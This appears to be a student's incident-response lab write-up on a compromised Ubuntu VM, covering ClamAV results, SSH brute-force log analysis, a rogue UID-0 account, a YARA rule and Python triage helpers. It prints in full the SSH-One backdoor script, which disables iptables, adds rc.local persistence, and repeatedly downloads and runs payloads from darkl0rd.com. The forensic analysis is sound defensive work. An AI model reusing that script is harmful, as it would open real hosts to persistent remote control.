Project

The document outlines a security assessment involving malware detection and suspicious activity on a virtual machine. ClamAV identified three infected files, including Unix malware and a backdoor script named SSH-One that disables the firewall and connects to a command and control server. Additional analysis revealed unauthorized user creation and a rogue process running with root privileges, indicating potential compromise of the system.

Uploaded by

tangero3124
TASK 1 :
========
ubuntu@ubuntu-VirtualBox:~$ cat clamAV_report.txt
/home/ubuntu/Downloads/moni.lod: OK
/home/ubuntu/Downloads/notes.txt: OK
/home/ubuntu/Downloads/SSH-One: OK
/home/ubuntu/Downloads/gates.lod: OK
/home/ubuntu/Downloads/ft32: Unix.Malware.Agent-6774375-0 FOUND
/home/ubuntu/Downloads/ft64: Unix.Malware.Agent-6774336-0 FOUND
/home/ubuntu/Downloads/wipefs: Unix.Tool.Miner-6443173-0 FOUND
/home/ubuntu/Downloads/tmplog: OK

----------- SCAN SUMMARY -----------


Known viruses: 8874078
Engine version: 0.100.3
Scanned directories: 1
Scanned files: 8
Infected files: 3
Data scanned: 2.42 MB
Data read: 2.40 MB (ratio 1.01:1)
Time: 60.816 sec (1 m 0 s)

=========

TASK 2 :
========
1-
ubuntu@ubuntu-VirtualBox:~$ ls -l /home/ubuntu/Downloads/
total 2488
-rw-rw-r-- 1 ubuntu ubuntu 66196 Nov 30 2018 ft32
-rw-rw-r-- 1 ubuntu ubuntu 66504 Nov 30 2018 ft64
-rwxr-xr-x 1 ubuntu ubuntu 5 Mar 12 2019 gates.lod
-rwxr-xr-x 1 ubuntu ubuntu 5 Mar 12 2019 moni.lod
-rw-r--r-- 1 root root 1841 Jun 10 2020 notes.txt
-rwxr-xr-x 1 ubuntu ubuntu 914 Jun 10 2020 SSH-One
-rw-r--r-- 1 ubuntu ubuntu 805 Mar 12 2019 tmplog
-rwxr-xr-x 1 ubuntu ubuntu 2384177 Mar 12 2019 wipefs
----
2- SSH-One File.
==
ubuntu@ubuntu-VirtualBox:~$ cat /home/ubuntu/Downloads/SSH-One
#!/bin/bash
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
echo "chmod +x /tmp/SSH-T" >> /etc/rc.local
echo "/tmp/SSH-T" >> /etc/rc.local
echo "chmod +x /tmp/SSH-One" >> /etc/rc.local
echo "/tmp/SSH-One" >> /etc/rc.local
m=SSH-T
script=SSH-One
hfs_m=http://darkl0rd.com:7758/SSH-T
hfs_s=http://darkl0rd.com:7758/SSH-One
rm -f /tmp/$m*
while true
do
ps aux | grep $m | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$m
if [ $? -eq 0 ];then
/tmp/$m
else
cd /tmp/;wget $hfs_m ; chmod a+x $m;/tmp/$m
fi
fi
ps aux | grep $script | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$script
if [ $? -eq 0];then
/tmp/$script
else
cd /tmp;wget $hfs_s ; chmod a+x $script;/tmp/$script
fi
fi
done
--
Suspicious File: SSH-One
Command & Control URLs: http://darkl0rd.com:7758/SSH-T and http://darkl0rd.com:7758/SSH-One

Reason for suspicion:
The script disables the firewall (flushes the iptables rules, stops the service and removes it from startup), sets up persistence by appending commands to /etc/rc.local, and in an endless loop downloads and executes two files (SSH-T and SSH-One) from an external Command & Control server (darkl0rd.com), re-fetching them whenever they are not running. This clearly indicates backdoor/malware behavior even though ClamAV did not flag the file.
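The indicators listed above can be pulled out of a script automatically. The following is an added example (not part of the report): a small static triage function that scans a shell script for remote URLs, startup persistence hooks, firewall tampering and download commands; the embedded sample is a constructed excerpt of the SSH-One lines quoted above.

```python
import re

# Constructed sample: an excerpt of the SSH-One script quoted in the report,
# embedded here so the triage runs offline.
SAMPLE_SCRIPT = """#!/bin/bash
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
echo "chmod +x /tmp/SSH-T" >> /etc/rc.local
echo "/tmp/SSH-T" >> /etc/rc.local
hfs_m=http://darkl0rd.com:7758/SSH-T
hfs_s=http://darkl0rd.com:7758/SSH-One
cd /tmp/;wget $hfs_m ; chmod a+x $m;/tmp/$m
"""

URL_RE = re.compile(r"https?://[^\s'\";]+")
FIREWALL_RE = re.compile(r"\b(iptables\s+-F|iptables\s+stop|chkconfig\s+iptables\s+off|ufw\s+disable)")
PERSIST_RE = re.compile(r">>\s*(/etc/rc\.local|/etc/crontab|/var/spool/cron\S*|\S*\.bashrc)")
DOWNLOAD_RE = re.compile(r"\b(wget|curl)\b")

def triage_script(text: str) -> dict:
    """Static triage of a shell script: collects the indicators a responder
    wants before calling it a backdoor (URLs, persistence targets, firewall
    tampering, download commands) and gives a coarse verdict."""
    findings = {"c2_urls": [], "persistence": [], "firewall_tampering": [],
                "downloads": 0}
    for line in text.splitlines():
        findings["c2_urls"].extend(URL_RE.findall(line))
        if FIREWALL_RE.search(line):
            findings["firewall_tampering"].append(line.strip())
        m = PERSIST_RE.search(line)
        if m:
            findings["persistence"].append(m.group(1))
        if DOWNLOAD_RE.search(line):
            findings["downloads"] += 1
    findings["c2_urls"] = sorted(set(findings["c2_urls"]))
    findings["persistence"] = sorted(set(findings["persistence"]))
    # Verdict: remote fetch + startup hook + firewall tampering together is
    # the dropper/backdoor pattern seen in SSH-One; anything less needs a human.
    findings["verdict"] = ("backdoor-like"
                           if findings["downloads"] and findings["persistence"]
                           and findings["firewall_tampering"]
                           else "needs review")
    return findings
```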
=========

TASK 3 :
========
unknown threat.yara
----
rule SSH_One_Backdoor
{
    meta:
        description = "Detects the SSH-One malware script"
        author = "A'laa"
        date = "2025-06-09"

    strings:
        $a = "darkl0rd.com"
        $b = "iptables -F"
        $c = "chmod +x /tmp/SSH-T"
        $d = "/tmp/SSH-One"

    condition:
        all of ($a, $b, $c, $d)
}
---

==========
SEC 2 :
=======

TASK 1 :
--
SCREENSHOT SENT BY USEF
--

TASK 2 :
========

ubuntu@ubuntu-VirtualBox:~$ sudo grep "Failed password" /var/log/auth.log.1 | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr
232 192.168.99.1
9 192.168.56.1
ubuntu@ubuntu-VirtualBox:~$

ubuntu@ubuntu-VirtualBox:~$ sudo grep "Accepted password" /var/log/auth.log.1
Jun 10 01:26:06 ubuntu-VirtualBox sshd[3053]: Accepted password for ubuntu from 192.168.99.1 port 56531 ssh2
Jun 10 09:49:03 ubuntu-VirtualBox sshd[5542]: Accepted password for ubuntu from 192.168.99.1 port 57157 ssh2
Jun 10 09:51:07 ubuntu-VirtualBox sshd[5808]: Accepted password for ubuntu from 192.168.99.1 port 57162 ssh2
Jun 10 10:18:16 ubuntu-VirtualBox sshd[6241]: Accepted password for ubuntu from 192.168.99.1 port 57679 ssh2
Sep 21 21:40:07 ubuntu-VirtualBox sshd[2732]: Accepted password for ubuntu from 192.168.56.1 port 56596 ssh2
Sep 22 10:53:57 ubuntu-VirtualBox sshd[2843]: Accepted password for ubuntu from 192.168.56.1 port 58331 ssh2

Malicious IP: 192.168.99.1 (232 failed password attempts, followed by successful logins as ubuntu on Jun 10)
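The grep/awk pipeline above counts failures per source address; the judgement that 192.168.99.1 is malicious comes from combining that count with the accepted logins. As an added example (not part of the report), the following parses sshd auth.log lines and automates that combination; the log lines are constructed samples in the same format, with the same hosts and IPs as the report.

```python
import re
from collections import Counter

# Constructed sample lines in sshd's auth.log format; the user, host and IPs
# mirror the report's output but these exact lines are made up here.
SAMPLE_AUTH_LOG = """\
Jun 10 01:25:51 ubuntu-VirtualBox sshd[3041]: Failed password for ubuntu from 192.168.99.1 port 56520 ssh2
Jun 10 01:25:55 ubuntu-VirtualBox sshd[3041]: Failed password for invalid user admin from 192.168.99.1 port 56520 ssh2
Jun 10 01:26:00 ubuntu-VirtualBox sshd[3047]: Failed password for ubuntu from 192.168.99.1 port 56528 ssh2
Jun 10 01:26:06 ubuntu-VirtualBox sshd[3053]: Accepted password for ubuntu from 192.168.99.1 port 56531 ssh2
Sep 21 21:39:58 ubuntu-VirtualBox sshd[2730]: Failed password for ubuntu from 192.168.56.1 port 56590 ssh2
Sep 21 21:40:07 ubuntu-VirtualBox sshd[2732]: Accepted password for ubuntu from 192.168.56.1 port 56596 ssh2
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_auth_log(text):
    """Yield (result, user, ip) for every sshd password event; other lines are skipped."""
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            yield m.group("result"), m.group("user"), m.group("ip")

def failures_by_ip(text):
    """The count the report's grep | awk '{print $(NF-3)}' | sort | uniq -c pipeline
    produces. 'invalid user' lines add two fields, which is why counting from the
    end of the line ($(NF-3)) works where a fixed field number would not."""
    return Counter(ip for res, _, ip in parse_auth_log(text) if res == "Failed")

def suspicious_sources(text, threshold=3):
    """IPs that failed at least `threshold` times and then logged in successfully:
    the brute-force-then-success pattern that singles out 192.168.99.1 in the report."""
    fails = failures_by_ip(text)
    accepted = {ip for res, _, ip in parse_auth_log(text) if res == "Accepted"}
    return sorted(ip for ip in accepted if fails[ip] >= threshold)
```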

------
TASK 3 :
========

IN A FILE NAMED Iptable_rule.txt TYPE :
--
sudo iptables -A INPUT -s 192.168.99.1 -p tcp --dport 22 -j DROP
--

TASK 4 :
========

Jun 10 10:31:05 ubuntu-VirtualBox useradd[7288]: new user: name=voldemort, UID=0, GID=0, home=/home/voldemort, shell=
--
ubuntu@ubuntu-VirtualBox:~$ awk -F: '($3 == 0) {print}' /etc/passwd
root:x:0:0:root:/root:/bin/bash
voldemort:x:0:0::/home/voldemort:
---
root 944 943 0 08:18 ? 00:00:00 sh
root 947 944 0 08:18 ? 00:00:00 /tmp/remotesec -k -l 56565
---
IN A FILE CALLED backdoor_details.text TYPE :
===

Rogue username: [voldemort]
Malicious process: /tmp/remotesec
Port: 56565

Justification:
The account voldemort was created with UID 0 and GID 0, so it has full root privileges despite not being the root account (the awk check on /etc/passwd lists it next to root).
The process '/tmp/remotesec' is running as root and is not a standard system process.
It resides in /tmp, which is an unusual location for a persistent binary.
Its arguments (-l 56565) show it listening on the non-standard port 56565, indicating it is likely a backdoor set up by the attacker to maintain remote access.
----
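Both checks in this task (UID-0 accounts in /etc/passwd and root processes running out of /tmp) can be scripted. The following is an added example, not from the report, that runs them over constructed /etc/passwd and ps -ef style samples containing the two rogue entries quoted above plus benign rows.

```python
import re

# Constructed samples mirroring the report's evidence: /etc/passwd entries and
# `ps -ef` rows (the two lines quoted in the report plus benign ones).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu,,,:/home/ubuntu:/bin/bash
voldemort:x:0:0::/home/voldemort:
"""
SAMPLE_PS = """\
root 1 0 0 08:17 ? 00:00:03 /sbin/init
root 944 943 0 08:18 ? 00:00:00 sh
root 947 944 0 08:18 ? 00:00:00 /tmp/remotesec -k -l 56565
ubuntu 1203 1 0 08:20 ? 00:00:00 /usr/bin/gnome-shell
"""

def rogue_accounts(passwd_text):
    """UID-0 accounts other than root (the awk '$3 == 0' check in the report),
    plus any account with an empty shell field, which a hand-written or
    scripted /etc/passwd line tends to leave blank."""
    hits = []
    for line in passwd_text.splitlines():
        name, _pw, uid, _gid, _gecos, _home, shell = line.split(":")
        reasons = []
        if uid == "0" and name != "root":
            reasons.append("uid 0")
        if shell == "":
            reasons.append("empty shell")
        if reasons:
            hits.append((name, reasons))
    return hits

PORT_FLAG_RE = re.compile(r"-l\s+(\d+)")
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def suspicious_root_processes(ps_text):
    """Root processes whose binary lives in a world-writable temp directory,
    with the listening port recovered from a '-l <port>' argument when present."""
    hits = []
    for line in ps_text.splitlines():
        fields = line.split(None, 7)  # user pid ppid c stime tty time cmd
        if len(fields) < 8 or fields[0] != "root":
            continue
        cmd = fields[7]
        exe = cmd.split()[0]
        if exe.startswith(TMP_DIRS):
            m = PORT_FLAG_RE.search(cmd)
            hits.append({"pid": int(fields[1]), "exe": exe,
                         "port": int(m.group(1)) if m else None})
    return hits
```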

TASK 5 :
========

sudo
